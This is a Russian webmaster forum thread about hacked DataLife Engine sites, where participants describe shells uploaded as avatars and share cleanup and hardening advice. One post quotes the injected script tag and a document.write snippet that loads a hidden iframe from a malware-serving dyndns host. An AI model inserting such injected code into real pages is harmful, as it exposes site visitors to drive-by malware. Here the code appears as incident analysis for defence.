- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Rebz, посмотрите аналогичные темы на форуме, я думаю Вам станет понятно что Вы очень сильно ошибаетесь!
Да вот смотрел. Один модуль "Переходы" чего стоит :)
PS Естественно я говорю про лицензионную версию, а не NULLED, где без бекдоров и прочих пасхальных яиц вряд ли обходится.
Могу помочь вылечить ваш сайт, за небольшую плату. Обращайтесь в ЛС.
И до сих пор не знаете что он дырявый и с большой долей вероятности на хостинге теперь живет шел ?
А по теме - ТС надо закрть уязвимости + почистить от шелов + почистить базу от js и iframe - гугл или webmoney вам помогут.
Знаю... Все это знают.
Заранее прошу прощения за то что влезаю со своей проблемой, но может кто нибудь уже сталкивался с данной проблемой:
Сайт перекасило, шрифт изменился а в хроме выдается такое сообщение :
сайт ****** содержит материалы сайта hghgfghgf.bitcrew.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
Сайт тоже на DLE
Стабильно работал на протяжении нескольких лет, без взяких модулей,хаков
Стабильно работал на протяжении нескольких лет, без взяких модулей,хаков
Опять же, ставьте заплатки, ищите шел и проверяйте базу.
Повырезал левые коды из php файлов DLE, все заработало
Заказал ремонт, вот в чем была причина:
Значит, как все было: исполнительный файл, под названием fr1992.php загрузили в виде аватара на сервер
(в директорию \uploads\fotos\), выполнили, тем самым собрав информацию о сайте и добавив вирусный код.
Сам код заключается в подключении скрипта (javascript) стороннего сайта, где размещен фрейм (iframe).
Данный скрипт подключается в начале вывода всех страниц сайта.
Вот он:
<script src="http://epic-win.dyndns.org/host.php?id=159"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN">
Как видим подключается сторонний java-script по адресу http://epic-win.dyndns.org/host.php?id=159
В данном файле код, написанный на javascript, который выводит на экран фрейм(ширина 10, высота 49 пиксилей),
но этот фрейм не видно так как он позиционирован сверху, над всей страницей:
document.write(’<div style="position: absolute;left: 0;bottom: 100%;">
<iframe src="http://epic-win.dyndns.org/forum.php" width="10" height="49"></iframe></div>’);
Убедиться в том, что там есть вирус можно через Яндекс или Антивирус Касперского.
Вирус был файле в \language\Russian\website.lng
Он был в очень страшной форме зашифрован и жутко спрятан.
Для предотвращения подобного, нужно убрать права на выполнение скриптов во всех папках uploads, оставить только на запись и чтение, выполнение - губит (744 выставить).
Заранее прошу прощения за то что влезаю со своей проблемой, но может кто нибудь уже сталкивался с данной проблемой:
Сайт перекасило, шрифт изменился а в хроме выдается такое сообщение :
сайт ****** содержит материалы сайта hghgfghgf.bitcrew.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
Сайт тоже на DLE
Стабильно работал на протяжении нескольких лет, без взяких модулей,хаков
у меня тоже самое.Фигурирует тоже сайт hghgfghgf.bitcrew.ru.Заражены все стр. сайта.
Касперский вот что выдает.Скачал сайт, проверил касперским на компе, нашел вирус в файлах шаблона:логин.тпл и маин.тпл.Удалил, залил на сайт.Опять тоже самое.Перерыл поиском все, кода нигде нет.А вирус есть.Заменил шаблон на тот которий идет по умолчанию - default.И вирус тут как тут.Как?DLE 8.3 дирявый Nulled
Для предотвращения подобного, нужно убрать права на выполнение скриптов во всех папках uploads, оставить только на запись и чтение, выполнение - губит (744 выставить).
Для предотвращения подобного не мешало бы иногда читать официальные сайты движков, которые вы ставите:
Защита папок скрипта от запуска сторонних скриптов
WebAlt, обошли уже и это:
Сегодня обнаружилась еще одна уязвимость в ДЛЕ, сайты разных версий 8.0, 8.3, 9.2, 9.4. Все известные заплатки были установлены. Свой сервер. От "соседей" проникнуть не могли. Стоит контроль доступа к файлам, проверка на наличие в файлах функций шела и прочие примочки безопасности. Все это дело обошли.
В логах уже нашел как и что делали через шелы. Но как залили эти шелы пока не нашел. Логов почти на 1,5 Гб...
Так что будьте бдительны, ДЛЕ шлет пламенный привет безопасности в очередной раз!